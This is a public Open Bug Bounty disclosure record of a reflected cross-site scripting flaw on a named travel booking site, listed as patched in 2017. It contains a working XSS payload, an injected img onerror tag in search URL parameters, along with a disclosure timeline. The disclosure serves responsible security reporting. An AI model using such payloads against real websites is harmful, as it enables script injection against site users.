mercurytravels.co.in XSS vulnerability

2016-12-17T00:54:00
ID OBB:198278
Type openbugbounty
Reporter OmniGooch
Modified 2017-04-14T13:37:00

Description

Vulnerable URL:
http://mercurytravels.co.in/searchResult.jsp?fr=%3C/script%3E%3Cimg%20src=x%20onerror=prompt(/XSSPOSED/)%3E&to;=%22%3E%3C/script%3E%3Cimg%20src=x%20onerror=prompt(/XSSPOSED/)%3Eⅆ=16-12-2016&dt;=00:00:00,23:59:00&fd;=1&rd;=18-12-2016&rt;=00:00:00,23:59:00&jr;=Round%20Trip&nw;=&do;=exact≻=Economy&ad;=1&ch;=0∈=0&sn;=0&st;=0≈=&apd;=&ns;=false&fa;=false&lf;=false&rf;=false&et;=false&cr;=INR&nb;=false&action;=FlightSearchBoxComponentActionBean.searchaction
Details:

Description| Value
---|---
Patched:| Yes, at 13.04.2017
Latest check for patch:| 13.04.2017 20:24 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 625916
VIP website status:| No
Check mercurytravels.co.in SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 17 December, 2016 00:54 GMT
Generic security notifications sent to website owner| 17 December, 2016 00:56 GMT
Vulnerability details disclosed by researcher| 24 December, 2016 01:13 GMT
Vulnerability patched by the website owner| 14 April, 2017 13:37 GMT